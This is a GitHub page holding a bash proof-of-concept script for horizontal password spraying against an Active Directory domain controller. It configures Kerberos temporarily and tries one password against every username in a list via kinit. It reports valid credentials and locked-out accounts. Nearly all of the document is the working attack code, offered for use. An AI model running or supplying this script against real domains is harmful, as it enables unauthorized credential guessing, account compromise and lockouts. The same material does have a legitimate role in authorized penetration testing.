-
Notifications
You must be signed in to change notification settings - Fork 14
/
Copy pathkinit_horizontal_brute.sh
executable file
·73 lines (62 loc) · 2.14 KB
/
kinit_horizontal_brute.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
#!/bin/bash
# Title: kinit_user_brute.sh
# Author: @ropnop
# Description: This is a PoC for doing horiztonal password sprays using 'kinit' to try to check out a TGT from a Domain Controller
# The script configures the realm and KDC for you based on the domain provided and the domain controller
# Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf
# Only tested with Heimdal kerberos (error messages might be different for MIT clients)
DOMAIN=$1
DOMAINCONTROLLER=$2
WORDLIST=$3
PASSWORD=$4
if [[ $# -ne 4 ]]; then
echo "[!] Usage: ./kinit_user_brute.sh <domain> <domain controller> <username list> <password>"
echo "[!] Example: ./kinit_user_brute.sh contoso.com dc1.contoso.com usernames.txt Password123"
exit 1
fi
DOMAIN=$(echo $DOMAIN | awk '{print toupper($0)}')
echo "[+] Kerberos Realm: $DOMAIN"
echo "[+] KDC: $DOMAINCONTROLLER"
echo ""
k5config=$(mktemp)
k5cache=$(mktemp)
cat > $k5config <<asdfasdf
[libdefaults]
default_realm = $DOMAIN
[realms]
$DOMAIN = {
kdc = $DOMAINCONTROLLER
admin_server = $DOMAINCONTROLLER
}
asdfasdf
START_TIME=$SECONDS
COUNT=0
while read USERNAME; do
USERNAME=$(echo $USERNAME | awk -F@ '{print $1}')
RESULT=$(
echo $PASSWORD | KRB5_CONFIG=$k5config KRB5CCNAME=$k5cache kinit --password-file=STDIN $USERNAME 2>&1
)
if [[ $RESULT == *"unable to reach"* ]]; then
echo "[!] Unable to find KDC for realm. Check domain and DC"
exit 1
elif [[ $RESULT == *"Wrong realm"* ]]; then
echo "[!] Wrong realm. Make sure domain and DC are correct"
exit 1
elif [[ $RESULT == *"Clients credentials have been revoked"* ]]; then
echo "[!] $USERNAME is locked out!"
elif [[ $RESULT == *"Client"* ]] && [[ $RESULT == *"unknown"* ]]; then
# username does not exist
: # pass
elif [[ $RESULT == *"Password incorrect"* ]]; then
# password incorrect
: #pass
elif [[ -z "$RESULT" ]]; then
echo "[+] Valid: $USERNAME@$DOMAIN : $PASSWORD"
else
echo "[+] Error trying $USERNAME: $RESULT"
fi
COUNT=$(($COUNT+1))
done <$WORDLIST
echo ""
echo "Tested \"$PASSWORD\" against $COUNT users in $(($SECONDS - $START_TIME)) seconds"
echo ""